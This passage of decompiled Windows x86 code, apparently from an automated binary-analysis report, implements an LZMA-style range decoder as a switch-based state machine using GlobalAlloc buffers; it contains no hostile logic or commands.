                                                            								_t597 = _t540 & 0x0000ffff;
                                                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                            								if( *(_t621 - 0xc) >= _t573) {
                                                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                            									 *(_t621 - 0x40) = 1;
                                                            									_t541 = _t540 - (_t540 >> 5);
                                                            									 *_t614 = _t541;
                                                            								} else {
                                                            									 *(_t621 - 0x10) = _t573;
                                                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                            								}
                                                            								if( *(_t621 - 0x10) >= 0x1000000) {
                                                            									goto L139;
                                                            								}
                                                            								L137:
                                                            								if( *(_t621 - 0x6c) == 0) {
                                                            									 *(_t621 - 0x88) = 5;
                                                            									L170:
                                                            									_t576 = 0x22;
                                                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                            									_t544 = 0;
                                                            									L172:
                                                            									return _t544;
                                                            								}
                                                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                            								L139:
                                                            								_t542 =  *(_t621 - 0x84);
                                                            								while(1) {
                                                            									 *(_t621 - 0x88) = _t542;
                                                            									while(1) {
                                                            										L1:
                                                            										_t543 =  *(_t621 - 0x88);
                                                            										if(_t543 > 0x1c) {
                                                            											break;
                                                            										}
                                                            										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                            											case 0:
                                                            												if( *(_t621 - 0x6c) == 0) {
                                                            													goto L170;
                                                            												}
                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                            												_t543 =  *( *(_t621 - 0x70));
                                                            												if(_t543 > 0xe1) {
                                                            													goto L171;
                                                            												}
                                                            												_t547 = _t543 & 0x000000ff;
                                                            												_push(0x2d);
                                                            												asm("cdq");
                                                            												_pop(_t578);
                                                            												_push(9);
                                                            												_pop(_t579);
                                                            												_t617 = _t547 / _t578;
                                                            												_t549 = _t547 % _t578 & 0x000000ff;
                                                            												asm("cdq");
                                                            												_t612 = _t549 % _t579 & 0x000000ff;
                                                            												 *(_t621 - 0x3c) = _t612;
                                                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                            													L10:
                                                            													if(_t620 == 0) {
                                                            														L12:
                                                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                            														goto L15;
                                                            													} else {
                                                            														goto L11;
                                                            													}
                                                            													do {
                                                            														L11:
                                                            														_t620 = _t620 - 1;
                                                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                            													} while (_t620 != 0);
                                                            													goto L12;
                                                            												}
                                                            												if( *(_t621 - 4) != 0) {
                                                            													GlobalFree( *(_t621 - 4));
                                                            												}
                                                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                            												 *(_t621 - 4) = _t543;
                                                            												if(_t543 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                            													goto L10;
                                                            												}
                                                            											case 1:
                                                            												L13:
                                                            												__eflags =  *(_t621 - 0x6c);
                                                            												if( *(_t621 - 0x6c) == 0) {
                                                            													 *(_t621 - 0x88) = 1;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                            												_t45 = _t621 - 0x48;
                                                            												 *_t45 =  *(_t621 - 0x48) + 1;
                                                            												__eflags =  *_t45;
                                                            												L15:
                                                            												if( *(_t621 - 0x48) < 4) {
                                                            													goto L13;
                                                            												}
                                                            												_t555 =  *(_t621 - 0x40);
                                                            												if(_t555 ==  *(_t621 - 0x74)) {
                                                            													L20:
                                                            													 *(_t621 - 0x48) = 5;
                                                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                            													goto L23;
                                                            												}
                                                            												 *(_t621 - 0x74) = _t555;
                                                            												if( *(_t621 - 8) != 0) {
                                                            													GlobalFree( *(_t621 - 8));
                                                            												}
                                                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                            												 *(_t621 - 8) = _t543;
                                                            												if(_t543 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													goto L20;
                                                            												}
                                                            											case 2:
                                                            												L24:
                                                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                            												 *(_t621 - 0x84) = 6;
                                                            												 *(_t621 - 0x4c) = _t562;
                                                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                            												goto L132;
                                                            											case 3:
                                                            												L21:
                                                            												__eflags =  *(_t621 - 0x6c);
                                                            												if( *(_t621 - 0x6c) == 0) {
                                                            													 *(_t621 - 0x88) = 3;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                            												_t67 = _t621 - 0x70;
                                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                            												__eflags =  *_t67;
                                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                            												L23:
                                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                            												if( *(_t621 - 0x48) != 0) {
                                                            													goto L21;
                                                            												}
                                                            												goto L24;
                                                            											case 4:
                                                            												L133:
                                                            												_t540 =  *_t614;
                                                            												_t597 = _t540 & 0x0000ffff;
                                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                            												if( *(_t621 - 0xc) >= _t573) {
                                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                            													 *(_t621 - 0x40) = 1;
                                                            													_t541 = _t540 - (_t540 >> 5);
                                                            													 *_t614 = _t541;
                                                            												} else {
                                                            													 *(_t621 - 0x10) = _t573;
                                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                            												}
                                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                                            													goto L139;
                                                            												}
                                                            											case 5:
                                                            												goto L137;
                                                            											case 6:
                                                            												__edx = 0;
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x34) = 1;
                                                            													 *(__ebp - 0x84) = 7;
                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            													L132:
                                                            													 *(_t621 - 0x54) = _t614;
                                                            													goto L133;
                                                            												}
                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            												__esi =  *(__ebp - 0x60);
                                                            												__cl = 8;
                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            												__ecx =  *(__ebp - 0x3c);
                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            												__ecx =  *(__ebp - 4);
                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												if( *(__ebp - 0x38) >= 4) {
                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                            														_t98 = __ebp - 0x38;
                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                            														__eflags =  *_t98;
                                                            													} else {
                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            													}
                                                            												} else {
                                                            													 *(__ebp - 0x38) = 0;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                            												if( *(__ebp - 0x34) == __edx) {
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													goto L61;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__ecx =  *(__ebp - 8);
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            													goto L41;
                                                            												}
                                                            											case 7:
                                                            												goto L0;
                                                            											case 8:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x84) = 0xa;
                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x38);
                                                            													__ecx =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                            													 *(__ebp - 0x84) = 9;
                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            												}
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t621 - 0x54) = _t614;
                                                            													goto L133;
                                                            												}
                                                            											case 9:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													goto L89;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x60);
                                                            												if( *(__ebp - 0x60) == 0) {
                                                            													goto L171;
                                                            												}
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            												__eflags = _t258;
                                                            												0 | _t258 = _t258 + _t258 + 9;
                                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            												goto L75;
                                                            											case 0xa:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x84) = 0xb;
                                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t621 - 0x54) = _t614;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x28);
                                                            												goto L88;
                                                            											case 0xb:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__ecx =  *(__ebp - 0x24);
                                                            													__eax =  *(__ebp - 0x20);
                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x24);
                                                            												}
                                                            												__ecx =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												L88:
                                                            												__ecx =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												L89:
                                                            												__eax =  *(__ebp - 4);
                                                            												 *(__ebp - 0x80) = 0x15;
                                                            												__eax =  *(__ebp - 4) + 0xa68;
                                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            												goto L68;
                                                            											case 0xc:
                                                            												L99:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xc;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t334 = __ebp - 0x70;
                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t334;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												goto L101;
                                                            											case 0xd:
                                                            												L37:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xd;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t122 = __ebp - 0x70;
                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t122;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L39:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            													goto L48;
                                                            												}
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													goto L54;
                                                            												}
                                                            												L41:
                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            												 *(__ebp - 0x48) = __eax;
                                                            												__eax = __eax + 1;
                                                            												__eax = __eax << 8;
                                                            												__eax = __eax + __ebx;
                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edx = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													 *(__ebp - 0x40) = 1;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													__ebx = __ebx + __ebx + 1;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edx;
                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L39;
                                                            												} else {
                                                            													goto L37;
                                                            												}
                                                            											case 0xe:
                                                            												L46:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xe;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t156 = __ebp - 0x70;
                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t156;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												while(1) {
                                                            													L48:
                                                            													__eflags = __ebx - 0x100;
                                                            													if(__ebx >= 0x100) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__edx = __ebx + __ebx;
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													__esi = __edx + __eax;
                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            													__ax =  *__esi;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__edi = __ax & 0x0000ffff;
                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            														__cx = __ax;
                                                            														_t170 = __edx + 1; // 0x1
                                                            														__ebx = _t170;
                                                            														__cx = __ax >> 5;
                                                            														__eflags = __eax;
                                                            														 *__esi = __ax;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __ecx;
                                                            														0x800 = 0x800 - __edi;
                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            														__ebx = __ebx + __ebx;
                                                            														 *__esi = __cx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														continue;
                                                            													} else {
                                                            														goto L46;
                                                            													}
                                                            												}
                                                            												L54:
                                                            												_t173 = __ebp - 0x34;
                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            												__eflags =  *_t173;
                                                            												goto L55;
                                                            											case 0xf:
                                                            												L58:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xf;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t203 = __ebp - 0x70;
                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t203;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L60:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													L55:
                                                            													__al =  *(__ebp - 0x44);
                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            													goto L56;
                                                            												}
                                                            												L61:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t217 = __edx + 1; // 0x1
                                                            													__ebx = _t217;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L60;
                                                            												} else {
                                                            													goto L58;
                                                            												}
                                                            											case 0x10:
                                                            												L109:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x10;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t365 = __ebp - 0x70;
                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t365;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												goto L111;
                                                            											case 0x11:
                                                            												L68:
                                                            												_t614 =  *(_t621 - 0x58);
                                                            												 *(_t621 - 0x84) = 0x12;
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t621 - 0x54) = _t614;
                                                            													goto L133;
                                                            												}
                                                            											case 0x12:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 0x58);
                                                            													 *(__ebp - 0x84) = 0x13;
                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t621 - 0x54) = _t614;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												__eflags = __eax;
                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            												goto L130;
                                                            											case 0x13:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													_t469 = __ebp - 0x58;
                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            													__eflags =  *_t469;
                                                            													 *(__ebp - 0x30) = 0x10;
                                                            													 *(__ebp - 0x40) = 8;
                                                            													L144:
                                                            													 *(__ebp - 0x7c) = 0x14;
                                                            													goto L145;
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												 *(__ebp - 0x30) = 8;
                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            												L130:
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												 *(__ebp - 0x40) = 3;
                                                            												goto L144;
                                                            											case 0x14:
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            												__eax =  *(__ebp - 0x80);
                                                            												 *(_t621 - 0x88) = _t542;
                                                            												goto L1;
                                                            											case 0x15:
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            												goto L120;
                                                            											case 0x16:
                                                            												__eax =  *(__ebp - 0x30);
                                                            												__eflags = __eax - 4;
                                                            												if(__eax >= 4) {
                                                            													_push(3);
                                                            													_pop(__eax);
                                                            												}
                                                            												__ecx =  *(__ebp - 4);
                                                            												 *(__ebp - 0x40) = 6;
                                                            												__eax = __eax << 7;
                                                            												 *(__ebp - 0x7c) = 0x19;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L145;
                                                            											case 0x17:
                                                            												L145:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												 *(__ebp - 0x50) = 1;
                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            												goto L149;
                                                            											case 0x18:
                                                            												L146:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x18;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t484 = __ebp - 0x70;
                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t484;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L148:
                                                            												_t487 = __ebp - 0x48;
                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                            												__eflags =  *_t487;
                                                            												L149:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__ecx =  *(__ebp - 0x40);
                                                            													__ebx =  *(__ebp - 0x50);
                                                            													0 = 1;
                                                            													__eax = 1 << __cl;
                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            													__eax =  *(__ebp - 0x7c);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													while(1) {
                                                            														 *(_t621 - 0x88) = _t542;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x50);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
